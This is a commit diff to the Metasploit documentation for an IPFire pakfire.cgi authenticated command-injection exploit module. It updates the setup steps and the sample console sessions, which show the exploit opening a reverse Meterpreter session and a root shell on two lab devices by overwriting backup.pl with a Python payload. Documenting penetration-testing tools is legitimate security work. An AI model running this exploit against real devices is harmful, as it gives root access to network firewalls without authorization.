added cve

Signed-off-by: MucahitSaratar <trregen222@gmail.com>

documentation/modules/exploit/linux/http/ipfire_pakfire_exec.md

@@ -4,8 +4,8 @@
   [IPFire 2.21 (Core Update 126)](https://mirror.csclub.uwaterloo.ca/ipfire/releases/ipfire-2.x/2.21-core126/ipfire-2.21.x86_64-full-core126.iso)
 
   This module exploits an authenticated command injection vulnerability in the
-  /cgi-bin/pakfire.cgi web page of IPFire devices running versions 2.25 Core Update 156
-  and prior to execute arbitrary code as the root user.
+  `/cgi-bin/pakfire.cgi` web page of IPFire devices running versions 2.25 Core Update 156
+  and prior to execute arbitrary code as the `root` user.
 
 ## Verification Steps
 
@@ -14,6 +14,7 @@
   1. Do: `set username <USERNAME OF THE ADMINISTRATIVE USER TO AUTHENTICATE TO THE WEB PORTAL AS>`
   1. Do: `set password <PASSWORD FOR admin USER ON THE WEB PORTAL>`
   1. Do: `set rhost <TARGET IP>`
+  1. Do: `set lhost <YOUR IP>`
   1. Do: `exploit`
   1. You should get a shell as the `root` user.
 
@@ -30,7 +31,7 @@
 ### IPFire 2.21 (Core Update 126)
 ```
 msf6 > use exploit/linux/http/ipfire_pakfire_exec
-[*] No payload configured, defaulting to python/meterpreter/reverse_tcp
+[*] Using configured payload python/meterpreter/reverse_tcp
 msf6 exploit(linux/http/ipfire_pakfire_exec) > show options
 
 Module options (exploit/linux/http/ipfire_pakfire_exec):
@@ -41,7 +42,12 @@ Module options (exploit/linux/http/ipfire_pakfire_exec):
    Proxies                    no        A proxy chain of format type:host:port[,type:host:port][...]
    RHOSTS                     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
    RPORT     444              yes       The target port (TCP)
+   SRVHOST   0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local ma
+                                        chine or 0.0.0.0 to listen on all addresses.
+   SRVPORT   8080             yes       The local port to listen on.
    SSL       false            no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                    no        Path to a custom SSL certificate (default is randomly generated)
+   URIPATH                    no        The URI to use for this exploit (default is random)
    USERNAME  admin            yes       User to login with
    VHOST                      no        HTTP server virtual host
 
@@ -50,7 +56,7 @@ Payload options (python/meterpreter/reverse_tcp):
 
    Name   Current Setting  Required  Description
    ----   ---------------  --------  -----------
-   LHOST  172.22.244.16    yes       The listen address (an interface may be specified)
+   LHOST                   yes       The listen address (an interface may be specified)
    LPORT  4444             yes       The listen port
 
 
@@ -58,47 +64,53 @@ Exploit target:
 
    Id  Name
    --  ----
-   0   Automatic Target
+   0   Python Dropper
 
 
-msf6 exploit(linux/http/ipfire_pakfire_exec) > set RHOSTS 172.22.244.50
-RHOSTS => 172.22.244.50
+msf6 exploit(linux/http/ipfire_pakfire_exec) > set RHOSTS 172.29.202.191
+RHOSTS => 172.29.202.191
 msf6 exploit(linux/http/ipfire_pakfire_exec) > set USERNAME admin
 USERNAME => admin
 msf6 exploit(linux/http/ipfire_pakfire_exec) > set PASSWORD admin
 PASSWORD => admin
-msf6 exploit(linux/http/ipfire_pakfire_exec) > set LPORT 9925
-LPORT => 9925
+msf6 exploit(linux/http/ipfire_pakfire_exec) > set LHOST 172.29.202.153
+LHOST => 172.29.202.153
 msf6 exploit(linux/http/ipfire_pakfire_exec) > exploit
 
-[*] Started reverse TCP handler on 172.22.244.16:9925
+[*] Started reverse TCP handler on 172.29.202.153:4444
 [*] Executing automatic check (disable AutoCheck to override)
 [+] The target appears to be vulnerable. Target is running IPFire 2.21 (Core Update 126)
-[*] Copying backup.pl to a backup file...
+[*] Backing up backup.pl to /tmp/1TiE8...
 [*] Overwriting the contents of backup.pl with a Python header statement
-[*] Appending the contents of backup.pl with code to setuid(0)
 [*] Appending the contents of backup.pl with the Python code to be executed.
-[*] Executing /usr/local/bin/backupctrl to execute the payload
-[*] Sending stage (39392 bytes) to 172.22.244.50
-[*] Meterpreter session 1 opened (172.22.244.16:9925 -> 172.22.244.50:41860) at 2021-06-04 16:48:12 -0500
-[*] You should now have your shell, restoring the original contents of the backup.pl file...
+[*] Executing /usr/local/bin/backupctrl to run the payload
+[*] Sending stage (39392 bytes) to 172.29.202.191
+[*] Meterpreter session 1 opened (172.29.202.153:4444 -> 172.29.202.191:38336) at 2021-06-08 14:05:41 -0500
+[+] You should now have your shell, restoring the original contents of the backup.pl file...
 [*] All done, enjoy the shells!
 
-meterpreter > getuid
-Server username: root
 meterpreter > sysinfo
 Computer     : ipfire.localdomain
 OS           : Linux 4.14.86-ipfire #1 SMP Tue Dec 11 08:36:08 GMT 2018
 Architecture : x64
 Meterpreter  : python/linux
-meterpreter >
+meterpreter > getuid
+Server username: root
+meterpreter > shell
+Process 28379 created.
+Channel 1 created.
+sh: cannot set terminal process group (27956): Inappropriate ioctl for device
+sh: no job control in this shell
+sh-4.3# id
+uid=0(root) gid=0(root) groups=0(root)
+sh-4.3#
 ```
 
 ### IPFire 2.25 (Core Update 156)
 
 ```
 msf6 > use exploit/linux/http/ipfire_pakfire_exec
-[*] No payload configured, defaulting to python/meterpreter/reverse_tcp
+[*] Using configured payload python/meterpreter/reverse_tcp
 msf6 exploit(linux/http/ipfire_pakfire_exec) > show options
 
 Module options (exploit/linux/http/ipfire_pakfire_exec):
@@ -109,7 +121,12 @@ Module options (exploit/linux/http/ipfire_pakfire_exec):
    Proxies                    no        A proxy chain of format type:host:port[,type:host:port][...]
    RHOSTS                     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
    RPORT     444              yes       The target port (TCP)
+   SRVHOST   0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local ma
+                                        chine or 0.0.0.0 to listen on all addresses.
+   SRVPORT   8080             yes       The local port to listen on.
    SSL       false            no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                    no        Path to a custom SSL certificate (default is randomly generated)
+   URIPATH                    no        The URI to use for this exploit (default is random)
    USERNAME  admin            yes       User to login with
    VHOST                      no        HTTP server virtual host
 
@@ -118,7 +135,7 @@ Payload options (python/meterpreter/reverse_tcp):
 
    Name   Current Setting  Required  Description
    ----   ---------------  --------  -----------
-   LHOST  172.22.244.16    yes       The listen address (an interface may be specified)
+   LHOST                   yes       The listen address (an interface may be specified)
    LPORT  4444             yes       The listen port
 
 
@@ -126,36 +143,44 @@ Exploit target:
 
    Id  Name
    --  ----
-   0   Automatic Target
+   0   Python Dropper
 
 
-msf6 exploit(linux/http/ipfire_pakfire_exec) > set RHOSTS 172.22.244.18
-RHOSTS => 172.22.244.18
+msf6 exploit(linux/http/ipfire_pakfire_exec) > set RHOST 172.29.202.157
+RHOST => 172.29.202.157
 msf6 exploit(linux/http/ipfire_pakfire_exec) > set USERNAME admin
 USERNAME => admin
 msf6 exploit(linux/http/ipfire_pakfire_exec) > set PASSWORD admin
 PASSWORD => admin
+msf6 exploit(linux/http/ipfire_pakfire_exec) > set LHOST 172.29.202.153
+LHOST => 172.29.202.153
 msf6 exploit(linux/http/ipfire_pakfire_exec) > exploit
 
-[*] Started reverse TCP handler on 172.22.244.16:4444
+[*] Started reverse TCP handler on 172.29.202.153:4444
 [*] Executing automatic check (disable AutoCheck to override)
 [+] The target appears to be vulnerable. Target is running IPFire 2.25 (Core Update 156)
-[*] Copying backup.pl to a backup file...
+[*] Backing up backup.pl to /tmp/8Yndo...
 [*] Overwriting the contents of backup.pl with a Python header statement
-[*] Appending the contents of backup.pl with code to setuid(0)
 [*] Appending the contents of backup.pl with the Python code to be executed.
-[*] Executing /usr/local/bin/backupctrl to execute the payload
-[*] Sending stage (39392 bytes) to 172.22.244.18
-[*] Meterpreter session 1 opened (172.22.244.16:4444 -> 172.22.244.18:33936) at 2021-06-04 16:07:39 -0500
-[*] You should now have your shell, restoring the original contents of the backup.pl file...
+[*] Executing /usr/local/bin/backupctrl to run the payload
+[*] Sending stage (39392 bytes) to 172.29.202.157
+[*] Meterpreter session 1 opened (172.29.202.153:4444 -> 172.29.202.157:37192) at 2021-06-08 14:02:03 -0500
+[+] You should now have your shell, restoring the original contents of the backup.pl file...
 [*] All done, enjoy the shells!
 
-meterpreter > getuid
-Server username: root
 meterpreter > sysinfo
 Computer     : ipfire.localdomain
 OS           : Linux 4.14.212-ipfire #1 SMP Tue May 4 09:02:54 GMT 2021
 Architecture : x64
 Meterpreter  : python/linux
-meterpreter >
+meterpreter > getuid
+Server username: root
+meterpreter > shell
+Process 10179 created.
+Channel 1 created.
+sh: cannot set terminal process group (10136): Inappropriate ioctl for device
+sh: no job control in this shell
+sh-5.0# id
+uid=0(root) gid=0(root) groups=0(root)
+sh-5.0#
 ```